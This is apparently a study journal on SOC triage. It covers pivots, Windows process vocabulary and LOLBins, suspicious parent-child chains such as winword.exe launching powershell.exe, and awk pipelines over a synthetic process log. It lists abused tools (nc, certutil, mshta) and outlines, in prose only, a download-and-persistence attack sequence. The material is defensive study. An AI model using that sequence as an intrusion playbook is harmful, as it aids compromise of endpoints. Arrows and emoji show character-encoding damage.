🎯 Goal

Build a stronger SOC analyst mental model using Linux command-line workflows by learning how to turn raw output into evidence through:

  • pivots (investigation anchors)
  • filtering, extraction, and grouping
  • parent β†’ child process relationships
  • process-name vocabulary (especially common Windows admin tools and LOLBins)

I also practiced this thinking using a fake endpoint process log lab with awk, sort, and uniq.


πŸ› οΈ What I Did

Reinforced the core SOC idea: raw events are material, not the answer

A key idea that became clearer today:

Raw events are narrative fragments.
Counting and grouping transforms them into evidence.

To analyze data effectively, I focused on three questions:

  • What part matters?
    Which field answers the question?

  • How do I isolate it?
    Filter noise and extract relevant fields.

  • How do I detect patterns?
    Count, group, and compare behavior.

This thinking directly connects Linux pipelines with SOC triage workflows.


Learned what a β€œpivot” means in investigations

A pivot is a value used to move an investigation forward across events.

Common pivots include:

  • IP address
  • username
  • hostname
  • process name
  • parent process
  • command line
  • domain
  • file hash
  • URL path
  • event result or status code

Two clarifications that helped:

  • hash β†’ fingerprint of a file’s contents (used to identify known malware or known-good files)
  • status/result β†’ outcome field such as success, failure, HTTP status codes, etc.

Without pivots, logs are just text.
With pivots, they become investigation paths.


Studied process names and their investigative value

Process names are clues, not conclusions.

Examples studied:

ssh
bash
powershell.exe
cmd.exe
curl
python
rundll32.exe
mshta.exe
wmic.exe
certutil.exe
wget
nc

Many attackers abuse legitimate tools known as:

LOLBins (Living Off the Land Binaries)
Legitimate system utilities used for malicious actions.

Seeing powershell.exe alone means nothing.

Context matters:

  • parent process
  • command line
  • user
  • host
  • timestamp
  • follow-on activity

Built a working vocabulary strategy

Instead of memorizing thousands of process names, I started grouping them by function.

Example categories:

  • admin tools
  • scripting engines and runtimes
  • browsers and Office apps (important parent processes)
  • LOLBins
  • security tools

This reduces cognitive load and improves pattern recognition.


Learned why parent β†’ child relationships matter

Parent-child process relationships are one of the fastest ways to spot suspicious behavior.

Example comparison:

powershell.exe

might be normal.

But:

winword.exe β†’ powershell.exe

is far more suspicious.

Examples of suspicious combinations studied:

winword.exe β†’ powershell.exe
excel.exe β†’ cmd.exe
outlook.exe β†’ mshta.exe
chrome.exe β†’ powershell.exe
msedge.exe β†’ mshta.exe
w3wp.exe β†’ cmd.exe
mshta.exe β†’ powershell.exe

Follow-up investigation should check:

  • command line arguments
  • user context
  • host type
  • process path
  • execution time
  • subsequent processes
  • network activity
  • baseline frequency

Built a fake endpoint process log lab

To practice analysis, I created a synthetic log file called:

proc_events.log

The file contained pipe-delimited fields:

  1. timestamp
  2. host
  3. user
  4. parent process
  5. child process
  6. command line

Correct parsing required:

awk -F'|'

Important lesson:

Do not assume spaces are delimiters, especially when command lines contain spaces.


Practiced SOC-style analysis pipelines

Using Linux pipelines, I answered investigative questions such as:

  • Which parent β†’ child combinations appear most often?
  • Which processes appear rarely?
  • Which hosts execute suspicious commands?
  • Which users trigger unusual activity?

Example pipeline pattern:

awk -F'|' '{print $4 " -> " $5}' proc_events.log | sort | uniq -c | sort -nr

Other exercises included:

  • filtering suspicious process names
  • grouping by host
  • grouping by user
  • identifying URLs inside command lines
  • finding rare processes

Reconstructed attack narratives

By examining suspicious chains in the synthetic dataset, I could reconstruct realistic attack sequences.

Example attack story:

  1. Office application launches PowerShell
  2. reconnaissance commands run (whoami, ipconfig)
  3. payload download using certutil
  4. DLL execution via rundll32
  5. persistence established with:
    • reg.exe
    • schtasks.exe

This made the phrase β€œraw events are narrative fragments” feel very real.


πŸ” Key Cybersecurity Connections

Linux pipelines mirror SIEM queries

Linux command-line workflows use the same logic as SIEM queries:

filter β†’ extract β†’ group β†’ rank β†’ interpret

Practicing pipelines builds the same reasoning required for SOC analysis.


Process triage depends on context

Suspicious tools alone are not enough to confirm malicious behavior.

Signal comes from:

  • parent β†’ child relationship
  • command-line arguments
  • user role
  • host type
  • baseline frequency
  • follow-on activity

Pivots drive investigations

Pivots allow analysts to follow activity across logs:

  • IP
  • host
  • user
  • process
  • domain
  • hash
  • result

Without pivots, analysts only read logs.
With pivots, they investigate behavior.


⚠️ Challenges

Process vocabulary is still developing

Many Windows process names are still unfamiliar, which slows interpretation.

Avoiding name-based conclusions

It is easy to treat scary-looking process names as proof of compromise.

Reminder:

name = clue
context = verdict

Parsing discipline

Incorrect assumptions about log structure can produce incorrect results.

Always inspect:

  • delimiter
  • field positions
  • log format

before parsing.


🧠 What I Learned

Technical

  • how SOC pivots work
  • why parent process and command line matter more than names
  • how common Windows utilities are abused
  • how to parse pipe-delimited logs with awk
  • how to construct analysis pipelines

Analytical mindset

  • raw events are not evidence
  • grouping reveals patterns
  • rare events often contain valuable signals
  • process chains reveal activity narratives

⏭️ Next Steps

  1. Repeat the fake process log lab without notes
  2. Run a challenge round on the same dataset
  3. Expand process-name vocabulary (5 processes per day)
  4. Practice additional log formats:
    • authentication logs
    • web access logs
    • JSON logs (jq)
  5. Begin mapping suspicious process chains to detection rules

πŸ’­ Reflection

Today felt like a major SOC foundations day.

The key realization was that Linux command-line skills are not just terminal tricks β€” they are a method for transforming raw event data into evidence.

Grouping process names into functional categories also made endpoint telemetry easier to interpret.

This type of groundwork directly supports future work in:

  • detection engineering
  • SOC triage
  • incident response
  • SIEM query building

🧩 Lessons Learned

What worked

  • grouping processes by function instead of memorizing names
  • using parent β†’ child relationships for fast context
  • practicing on synthetic logs
  • repeating the filter β†’ isolate β†’ group workflow

What broke

  • unfamiliarity with many Windows process names
  • risk of treating process names as conclusions

Why it broke

  • early stage of building SOC vocabulary
  • endpoint telemetry requires context-rich thinking

Fix / takeaway

  • build a working vocabulary of common processes
  • always inspect log format before parsing
  • treat process names as starting points, not conclusions